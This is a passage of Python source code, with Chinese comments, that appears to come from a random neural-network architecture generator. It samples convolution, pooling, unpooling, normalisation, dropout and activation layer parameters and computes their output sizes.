link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [6] # 加入层id列表中
self.layer_num += 1
pool_type = params[-1]
if pool_type == 0 and random.randint(1,100) <= 20:
params = self.make_layer(9,last_layer_input_size,final_output_size)
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [9] # 加入层id列表中
self.layer_num += 1
else:
params = self.make_layer(12,last_layer_input_size,final_output_size)
output_size = params[3:6]
last_layer_input_size = output_size
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [12] # 加入层id列表中
self.layer_num += 1
return self.layer_num - 1 #返回该线性序列的最后一个节点的索引号
def make_layer(self,layer_id,input_size,output_size=None,add_num=None,out_channels=None):
# print(layer_id,input_size,output_size)
'''
layer_id:神经网络层的id
input_size: list
返回参数向量
'''
# print(layer_id,input_size,output_size)
if(layer_id == 0):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups = [0 for index in range(7)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0]
output_size = [input_size[0],out_channels,input_length]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(output_size==None):
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],out_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
in_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups]]
elif(layer_id == 1):
# print('1conv2d',input_size,output_size)
low_channel_prob = 0.5
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = [0 for index in range(11)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
# print(int(in_channels/0.8),int(in_channels*1.2))
out_channels = random.randint(int(in_channels*0.8),int(in_channels*1.2))
# if self.large == 1 and out_channels > 600:
# out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
# elif self.large == 0 and out_channels > 200:
out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
# print('2conv2d',input_size,output_size)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.78,0.05,0.1,0.04,0.01,0.01,0.01])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(output_size==None):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],out_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups]]
elif(layer_id == 2):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,\
groups = [0 for index in range(15)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
# print('in_channels,out_channels,common_divisor',in_channels,out_channels,common_divisor)
#生成stride,padding
if(output_size==None):
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],out_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
#先寻找height width
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups]]
elif(layer_id == 3):
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = [0 for index in range(8)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_length]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_size = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
padding_size = random.randint(0,kernel_size)
ouput_length = output_padding_size + stride_size*(input_length - 1) - 2*padding_size + dilation_size*(kernel_size - 1) + 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_length]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding,output_padding,dilation_size,groups]]
elif(layer_id == 4):
#由于size无法成倍缩小,暂时只支持output_size = None
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,\
stride_width,padding_height,padding_width,dilation,groups,output_padding_height,output_padding_width = [0 for index in range(12)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
ouput_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
ouput_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = ouput_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = ouput_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_height,ouput_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]]
# return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
# padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 5):
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation,groups = [0 for index in range(16)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
output_padding_depth = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
stride_height,stride_width,stride_depth = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
ouput_depth = output_padding_depth + stride_depth*(input_depth - 1) - 2*padding_depth + dilation_size*(kernel_size_depth - 1) + 1
ouput_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
ouput_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = ouput_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = ouput_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_depth,ouput_height,ouput_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
# stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
# dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation_size,groups]]
# return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
# padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 6):
#如果是max pooling则需要返回indices
input_length = input_size[2]
input_channels = input_size[1]
kernel_size,stride_size,padding_size,dilation_size,pool_type = [0 for index in range(5)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
if(pool_type == 1):
dilation_size = 1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],input_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (input_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size,dilation_size,pool_type]]
elif(layer_id == 7):
#如果是max pooling则需要返回indices
input_height = input_size[2]
input_width = input_size[3]
input_channels = input_size[1]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = [0 for index in range(9)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
if(pool_type == 1):
dilation_height,dilation_width = 1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = 0
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type]]
elif(layer_id == 8):
#如果是max pooling则需要返回indices
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
input_channels = input_size[1]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = [0 for index in range(13)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
if(pool_type == 1):
dilation_depth,dilation_height,dilation_width = 1,1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type]]
elif(layer_id == 9):
input_channels = input_size[1]
input_length = input_size[2]
kernel_size,stride_size,padding_size = [0 for index in range(3)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length-1)*stride_size - 2*padding_size + kernel_size
output_size = [input_size[0],input_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size + out_length) / (input_length-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
# return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(layer_id == 10):
input_channels = input_size[1]
input_height = input_size[2]
input_width = input_size[3]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = [0 for index in range(6)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(layer_id == 11):
input_channels = input_size[1]
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = [0 for index in range(9)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth-1)*stride_depth - 2*padding_depth + kernel_size_depth
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width]]
elif(layer_id == 12):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 13):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 14):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 15):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 16):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 17):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 18):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 19):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 20):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 21):
return input_size+output_size
elif(layer_id == 22):
activation_type = random.randint(1,4)
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
if(activation_type == 1):
return [input_size[0],length] + [1,0,0,0]
elif(activation_type == 2):
return [input_size[0],length] + [0,1,0,0]
elif(activation_type == 3):
return [input_size[0],length] + [0,0,1,0]
else:
return [input_size[0],length] + [0,0,0,1]
#由于add和concat不是实际的神经网络层,随便返回一个神经网络层
elif(layer_id == 23):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[out_channels]
elif(layer_id == 24):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[add_num]
elif(layer_id == 25):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 26):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
def get_net_input_size(self):
if(self.dimension == 1):
return [1,1,random.randint(100,10000)]
elif(self.dimension == 2):
pic_edge_length = random.randint(28,224)
if(random.randint(1,100) < 15):
pic_edge_length = 224
pic_edge_length = 224
return [1,random.randint(1,3),pic_edge_length,pic_edge_length]
else:
pic_edge_length = random.randint(28,112)
video_frames = random.randint(15,80)
return [1,random.randint(1,3),video_frames,pic_edge_length,pic_edge_length]
def get_layer_output_size(self,params,input_size):
'''
根据一层的输入尺寸,得到该层的输出尺寸
params:list
input_size:list
return list
'''
def prob_random(self,arr1,arr2):
'''
指定概率,获取随机数
'''
assert len(arr1) == len(arr2), "Length does not match."
# assert sum(arr2) == 1 , "Total rate is not 1."
